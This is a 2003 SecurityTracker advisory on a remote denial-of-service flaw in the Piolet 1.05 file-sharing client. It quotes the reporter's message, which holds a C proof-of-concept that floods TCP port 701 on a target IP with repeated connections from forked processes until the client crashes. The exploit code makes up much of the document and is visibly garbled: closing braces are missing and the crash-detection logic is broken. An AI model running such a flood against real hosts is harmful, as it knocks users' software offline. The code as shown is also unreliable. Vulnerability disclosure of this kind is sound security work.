Piolet File Sharing Client Can Be Crashed By a Remote User Send a Data Flood
|
|
SecurityTracker Alert ID: 1007539
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Aug 20 2003
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Version(s): 1.05
|
Description: A denial of service vulnerability was reported in the Piolet file sharing client. A remote user can cause the client to crash.
It is reported that a remote user can connect to the target client on TCP port 701 and send a large amount of data to cause the target
client to crash. According to the report, the attack will not be logged by the application.
A demonstration exploit is provided
in the Source Message.
|
Impact: A remote user can cause the client to crash.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.piolet.com/ (Links to External Site)
|
Cause: Exception handling error
|
Underlying OS: Windows (Any)
|
Reported By: Luca Ercoli <luca.ercoli@inwind.it>
|
Message History:
None.
|
Source Message Contents
|
Date: 20 Aug 2003 17:33:07 -0000
From: Luca Ercoli <luca.ercoli@inwind.it>
Subject: Piolet client vulnerable to a remote DoS
|
What's Piolet: Piolet is a peer-to-peer file sharing client.
More information can be found at www.piolet.com
Vulnerability Description: By connecting TCP port 701, client show to user
a "voice chat session request" message.
Flooding this port, a remote attacker could
cause the application to crash. This attack
will go unlogged.
Affected Software: Piolet ver. 1.05
Exploit:
/************************************************************
* Piolet client v1.05 Remote Denial of Service *
* Proof of Concept by Luca Ercoli luca.ercoli[at]inwind.it *
************************************************************/
#include <stdio.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
int ck,port=701,sd,cx=0,contatore=0,prec;
struct sockaddr_in pilot_client;
void ending(char *client){
int i;
pilot_client.sin_family = AF_INET;
pilot_client.sin_port = htons((u_short)port);
pilot_client.sin_addr.s_addr = (long)inet_addr(client);
for(i = 0; i < 100; i++){
sd = socket(AF_INET, SOCK_STREAM, 0);
ck = connect(sd, (struct sockaddr *) &pilot_client, sizeof(pilot_client));
if(ck != 0) {
prec = 0;
if (prec == 0) contatore++;
if (prec == 1) contatore = 0;
if (contatore > 13) {
printf("! Remote client seems to be crashed.\n");
exit(0);
if(ck == 0) prec = 1;
close(sd);
void kill_pilot(char *stringa){
short i;
pilot_client.sin_family = AF_INET;
pilot_client.sin_port = htons((u_short)port);
pilot_client.sin_addr.s_addr = (long)inet_addr(stringa);
for(i = 0; i < 50; i++){
sd = socket(AF_INET, SOCK_STREAM, 0);
ck = connect(sd, (struct sockaddr *) &pilot_client, sizeof(pilot_client));
if(ck != 0) exit(0);
close(sd);
int main(int argc, char **argv)
short i;
prec = 0;
if(argc < 2)
{
printf("\nUsage: %s <client-ip>\n", argv[0]);
exit(0);
}
prec=0;
printf ("\n\n+ DoS Started...\n");
printf("+ Flooding remote client...\n");
for (i=0; i<12; i++) if(!fork()) kill_pilot(argv[1]);
printf ("+ Ending...\n");
ending(argv[1]);
--
Luca Ercoli luca.ercoli[at]inwind.it
|
|
